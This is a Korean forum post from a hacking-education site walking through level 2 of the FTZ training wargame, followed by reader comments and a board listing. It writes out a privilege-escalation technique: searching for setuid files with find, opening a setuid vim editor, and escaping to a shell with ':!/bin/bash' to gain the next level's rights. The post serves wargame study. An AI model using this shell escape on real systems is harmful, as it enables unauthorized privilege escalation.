1580, 8/79 회원가입  로그인  
   결빙
   해쿨 level2 강의

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1229 [복사]


안녕하세용... 이번에 처음 글을 올리는 "결빙"입니다...
트레이너를 수료해도 level해킹을 전혀 할줄 모르겠다!
그럼 이 글을 보세용 ㅎㅎ
=========================================================

login as: level2
level2@ftz.hackerschool.org's password:비번은 아시겠죠? ㅎㅎ

[level2@ftz level2]$ ls -l
total 16
-rw-r--r--    1 root     root           60 Mar 23  2000 hint
drwxr-xr-x    2 root     level2       4096 Feb 24  2002 public_html
drwxrwxr-x    2 root     level2       8192 Jul  5 21:31 tmp

#일단 hint 파일이 있는지 살펴봅니다....
#hint 파일이 있네요! 그러면 힌트를 봐 봅시다!

[level2@ftz level2]$ cat hint


텍스트 파일 편집중 쉘의 명령을 실행시킬 수 있다는데...

#힌트를 봅시다... 텍스트 파일 편집중에 쉘의 명령을 실행시킬수 있다죠?
#그럼 setUID 파일이 있는지 find 명령어로 찾아봅시다...


[level2@ftz level2]$ find / -perm -4000 -user level3 2> /dev/null

#자... 하나 나왔네요...

/usr/bin/editor

#에디터라....한번 실행해 봅시다....

[level2@ftz level2]$ /usr/bin/editor

#자!이제 VIM이 나옵니다... VIM은
#리눅스 대표텍스트 에디터인데요...
#우리는 이렇게 생각합시다.. 윈도우즈엔 메모장이 있다면!
#리눅스에는 VIM이 있다!!
#VI창을 봅시다...

~
~
~
~
~
~                              VIM - Vi IMproved
~
~                               version 6.1.320
~                           by Bram Moolenaar et al.
~                 Vim is open source and freely distributable
~
~                        Help poor children in Uganda!
~                type  :help iccf<Enter>       for information
~
~                type  :q<Enter>               to exit
~                type  :help<Enter>  or  <F1>  for on-line help
~                type  :help version6<Enter>   for version info
~
~
~
~
~

#이렇게 되있습니다...

#아까 검색했을때 이 파일엔 setUID가 걸려있었습니다..
#다시말해 이파일을 실행중에는 level3의 권한으로 실행된다는 것이죠...
#봅시다.. VIM사용법중에 텍스트 편집중 파일을 실행할수 있다는걸 아십니까?
#(Esc)를 누르고느낌표(!)를 두번 입력하여줍니다...
#그럼 밑에 ":.!"라고 표시될것입니다...
#그럼 예를 봅시다...

~
~
~
~
~
~                              VIM - Vi IMproved
~
~                               version 6.1.320
~                           by Bram Moolenaar et al.
~                 Vim is open source and freely distributable
~
~                        Help poor children in Uganda!
~                type  :help iccf<Enter>       for information
~
~                type  :q<Enter>               to exit
~                type  :help<Enter>  or  <F1>  for on-line help
~                type  :help version6<Enter>   for version info
~
~
~
~
~
:.!

#↑보이시죠? 자 이제 여기 쉘명령을 입력해 줍시다....

:.!

#하지만 그대로 하면 오류같은게 뜹니다...

shell returned 127

Hit ENTER or type command to continue

#라고 뜹니다.... 자 문제는

:.!

#여기 있습니다... 보세요... 명령어는 !/file 이라했는데

:!

#이렇게 고쳐줍니다.... 그리고 쉘 명령어를 입력합니다....

:!/bin/bash

#또는

:!sh

#그럼 레벨 3의 권한을 얻게됩니다

[level3@ftz level2]$

#이제 뭘해야할지 아시겠죠?
#my-pass명령어로 레벨 3 패스워드를 알아냅니다...

[level3@ftz level2]$ my-pass

#패스워드 창이 뜹니다...

Level3 Password is "************".

[level3@ftz level2]$

#패스워드는 *로 채웠습니다... level2는 비교작 쉬우니
#자기 실력으로 풀어봅시다!





  Hit : 11447     Date : 2009/07/07 04:39



    
sjk1213 니마 이거 비번 입력 할때 따옴표도 입력해야 하나요? 저 그것때문에 지금 몇번을 비번 쳤는데 레벨3에 접속이 안되고 있어요.ㅜ.ㅡ 2009/07/08  
결빙 ㄴ ㅎㅎ 비번 입력할때, 큰따옴표입력까지 할 필요는 없답니다^^ 2009/07/10  
pds7724 ㅎㅎ 이건 답을 다 알려주는 것인디^^ 2009/07/23  
ssake2002 level1이랑 비슷한듯...?
그래도 어려워~
2009/07/26  
결빙 pds님 죄송해요 ㅠㅠ 2009/07/30  
hse9422 전 해도 해도 '[level2@ftz level2]$'라고
프롬프트가 바뀌질 않는데...
2009/07/30  
hse9422 ㅈㅅ 제가 잘못했던거임.. 실행을 시키는 거였는데 만들고 있었네요.. ㅋㅋ ㅈㅅ 2009/07/30  
결빙 ㄴ ㅎㅎㅎㅎ갠차나요 다그럴수 있는거니 ㅎ 2009/08/01  
islhoeve 워어어..어렵다..ㅎㅎ 2011/04/04  
rlduq1993 /usr/bin/editor을 치면 허가 거부됨이라고 드네요. 2011/11/29  
1440   I. 리눅스 구조 및 일반 명령어.     괴도js
07/04 12527
1439   2번째C강좌~![9]     괴도js
07/03 11773
1438   C강좌;;라 할것잇나?[1]     괴도js
07/03 11040
1437   [Bash Shell] 정복하기[1]     괴도js
07/04 9875
1436   [C강좌] C언어의 기본개요     괴도js
07/02 11069
1435   C언어 기본구조[1]     괴도js
07/02 12306
1434   II. 일반명령어2.     괴도js
07/04 10148
1433   커널버전 확인하기ㅋ[1]     괴도js
07/02 8919
1432   ftz 를위한 자잘한 tip을 알려주세요[3]     금빛갑옷
11/14 6566
1431   [자작] 아직은 부족하지만 제가 정리한 텍스트 입니다[8]     김성근
02/06 6679
1430   [펌]우분투(ubuntu) 사상이란?     김병권
02/04 9885
1429   해킹툴 팝니다.^^ 키로그![14]     고슴도치
09/12 8984
  해쿨 level2 강의[10]     결빙
07/07 11446
1427   [펌]Ptrace를 이용한 재미는 해킹.[4]     ^^
02/08 12611
1426   Linux 에서 APM(apache+php+mysql) 소스로 설치 하기[5]     포비
10/29 7613
1425   cisco ios 소프트웨어 cli [1] 이글 올려두되나...???     캐럴린
04/27 8878
1424   PHP공부하실분? 구합니다.[1]     카르페이
04/23 7136
1423   같이공부하실분~[1]     카르페이
04/23 8114
1422   레지스트리 핵심 명령어 요약[1]     카르페이
05/08 8752
1421   정보처리기능사 소프트웨어 공학 모음집 입니다.[1]     카르페이
05/08 7797
[1][2][3][4][5][6][7] 8 [9][10]..[79]

Copyright 1999-2023 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org & Wowhacker.com